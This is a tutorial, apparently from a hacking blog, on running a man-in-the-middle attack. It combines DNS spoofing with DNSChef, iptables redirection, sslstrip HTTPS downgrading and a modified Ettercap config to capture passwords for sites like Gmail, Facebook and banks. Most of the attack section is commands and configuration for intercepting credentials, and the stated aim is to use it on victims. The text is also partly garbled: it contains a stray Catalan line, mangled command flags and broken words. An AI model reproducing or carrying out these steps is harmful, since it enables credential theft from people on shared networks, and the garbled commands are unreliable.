Greetings everyone
** From the title you can pretty much guess what is this tutorial all about ! so let’s go ahead and dive in
First you need to have a tool called ” Dnschef ” Download it from : https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz
Ofcours we need to have : Dsniff and Ettercap and sslstrip, i suggest you use a pentest distro of your choice rather than installing sniffing/spoofing tools on your own.
root@ubuntu:~# cd dnschef-0.2.1
root@ubuntu:~/dnschef-0.2.1# ./dnschef.py
_ _ __
| | version 0.2 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | ‘_ \/ __|/ __| ‘_ \ / _ \ _|
| (_| | | | \__ \ (__| | | | __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org
- DNSChef started on interface: 127.0.0.1
- Using the following nameservers: 8.8.8.8
- No parameters were specified. Running in full proxy mode
Introduction
This is what we will attack an attack MIM (Man in the Middle) using DNS spoofing (impersonation DNS service) and capture SSL traffic, thereby passwords sites like Gmail, Facebook, Hotmail, banks.
Attack
To do this you need to modify the victim DNS
Introduction
First prepare the DNS service to do the impersonation. To do this we will use DNSChef will redirect some of the resolutions domain name to a specific IP.
dnschef.py python – interface = 192.168.1.7 – 192.168.1.7 = fakeip
– Interface: IP interface that will listen for DNS requests and that we will be introduced to computer previously victim.
– Fakeip: IP dnschef returned as resolution domain. If the victim is remote need to enter the public IP address of attacker.
– Truedomains: Domains solve your real IP (to see if it works without this option).
While we follow the network traffic re-directed client continues its normal course, so that the victim does not experience any ill-operation on the connection.
echo 1> / proc/sys/net/ipv4/ip_forward
iptables-t nat-A PREROUTING-p tcp – destination-port 80-j REDIRECT – to-port 10000
Also necessary in case of a remote attack, redirect ports 53 (DNS) and 80 (HTTP) on our router to the attacking machine.
To finish preparing the machine to be lacking attacking the SSL traffic (in this case focus on HTTPS) will clear text from the attacker to the victim and figures from the attacker to the legitimate server. We will do this by SSLStrip And its a option (all types of traffic).
./sslstrip.py
Now only other start capturing traffic and passwords. To do this we use ETTERCAP because we will have a very clear vision of the captured username and password. Unfortunately we need to change default settings Ettercap to make it modify the file / usr / local / etc / etter.conf I do the following changes:
Modify settings and ec_uid ec_gid.
[privs]
ec_uid = 0 #ec_uid = 65534 # nobody is the default
ec_gid = 0 #ec_gid = 65534 # nobody is the default
I des-comentar les línies corresponents a l’ús de ip_tables
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can’t use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.
#—————
# Linux
#—————
# if you use ipchains:
#redir_command_on = “ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport”
#redir_command_off = “ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport”
# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
Run Ettercap so that the packets appear only in text mode (T) without headers (q) through eth0 interface (I)
ettercap-T-q-i ” Your interface”.
With any luck in a few minutes to start running the password screen. If you need to stop the attack while running is quite convenient to redirect the output to a file Ettercap.
Detection
This type of attack can only be detected by the following methods:
Do not use HTTPS. The URL can see that using the https encryption protocol. This is possibly the easiest way to detect the attack.
Resolving domain IP anomaly: If we see that the ping command resolves the DNS server IP is not normal or even what is within our internal netwIntroductionork.
Changing network settings: Finally we check if the DNS settings can detect a change of this parameter does not fit within the structure of our network.
With traceroute would see a jump for the attacking host.
I hope you have enjoyed the tutorial.